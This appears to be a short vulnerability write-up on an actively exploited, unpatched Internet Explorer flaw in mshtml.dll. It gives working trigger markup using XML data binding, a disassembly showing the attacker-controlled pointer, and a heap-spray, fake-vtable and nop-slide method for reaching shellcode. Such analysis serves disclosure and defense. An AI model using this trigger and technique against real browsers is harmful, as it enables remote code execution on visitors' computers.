A critical vulnerability in several versions of Internet Explorer is being actively exploited. The vulnerability has not been patched yet by Microsoft, which means that your computer can get compromised by simply visiting a web page (using Internet Explorer) that exploits the vulnerability. Here is some code that can be used to trigger the vulnerability:
<xml id="foo"> <data><entry><![CDATA[<image src="http://&#x0c0c;&#x0c0c;AAAAAAAAAAA">]]></entry></data> </xml> <span datasrc="#foo" datafld="entry" dataformatas="html"> <span datasrc="#foo" datafld="entry" dataformatas="html"> </span> </span>
When the code above is rendered by Internet Explorer, the first four bytes after the protocol in the URL specified in the image element can be used to control an object pointer in the RunHTMLApplication function in mshtml.dll. These four bytes (0c0c0c0c) gets stored in the eax register as shown below (code is from Internet Explorer 8 Beta 2):
mshtml!RunHTMLApplication+0x52db: 6a795bbd 8b08 mov ecx,dword ptr [eax] ds:0023:0c0c0c0c=????????
Here is the code that follows:
68565bbf 57 push edi 68565bc0 50 push eax 68565bc1 ff91c4000000 call dword ptr [ecx+0C4h]
As you can see, the pointer copied to the ecx register should be pointing to a vtable (virtual method table). In the last line in the code above, you can see that control is transferred to one of the methods in the vtable whose address is stored at ecx + 0xc4. The vulnerability can be exploited by constructing a fake vtable at 0x0c0c0c0c (e.g., using heap spraying), where each method in the fake vtable points to 0x0c0c0c0c.
The shellcode can be stored after the data that serves as the fake vtable. When control is transferred to the address stored at ecx + 0xc4 (0x0c0c0c0c), the bytes starting at that address will serve as a nop slide that leads to the shellcode.